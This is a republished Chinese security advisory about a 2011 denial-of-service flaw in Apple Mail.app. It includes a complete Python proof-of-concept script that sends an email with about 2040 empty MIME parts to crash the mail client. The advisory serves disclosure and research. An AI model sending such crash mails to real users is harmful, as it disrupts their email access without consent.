Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Apple Mail.app mail拒绝服务漏洞

发布日期:2011-11-01
更新日期:2011-11-01受影响系统:
Apple Mac OS X 10.7.2
Apple Mail 5.1
描述:
--------------------------------------------------------------------------------
Mail.app是Apple的Mac OS X操作系统中自带的电子邮件程序。Mail.app电子邮件客户端在实现上存在拒绝服务漏洞,通过发送大于2023 MIME的附件到邮件客户端,在解析时可造成其崩溃。<*来源:shebang42
 
  链接:http://seclists.org/bugtraq/2011/Oct/214
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!shebang42 ()提供了如下测试方法:#!/usr/bin/env python# Mail of death for Apple"s Mail.app
#
# Tested & vulnerable:  Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42import smtplibn_attach=2040 # ~2024 is sufficient
relay="your.mta.goes.here"
mailfrom = "mail_of_death () example com"
mailto = mailfrom
subject = "PoC Apple Mail.app mail of death"
date = "October 29, 2011 10:00:00 GMT"
def craft_mail():
    header = "From: %s To: %s Subject: %s Date: %s Content-Type: multipart/mixed ; boundary="delim" " %
(mailfrom, mailto, subject, date)
    body = "--delim Content-Type: text/plain Content-Disposition: inline Hello World Bye Mail.app "
    attach = "--delim Content-Disposition: inline "*n_attach    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = "--delim Content-Type: text/plain Content-Disposition: attachment;
filename=AAAAAAAA content "*n_attach
    return header + body + attach
def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()mail=craft_mail()
#print mail
send_mail (mail)建议:
--------------------------------------------------------------------------------
厂商补丁:Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://support.apple.com/VMware vCenter产品JRE多个安全漏洞X.Org X11文件读取权限信息泄露漏洞相关资讯      Apple  Apple漏洞 
  • Apple 计划在爱尔兰增聘一千人  (11/12/2015 13:36:24)
  • Apple 官网改版,大刀一挥把「商店  (08/07/2015 17:14:47)
  • Apple 买下了一间拥有可改变景深照  (04/15/2015 11:10:01)
  • 有指 Apple 曾跟加州政府部门讨论  (09/20/2015 21:23:12)
  • 封闭的 Apple 其实一直在用开源技  (04/30/2015 09:09:38)
  • Tim Cook:Apple 不像 Microsoft,  (03/19/2015 10:24:47)
本文评论 查看全部评论 (0)
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款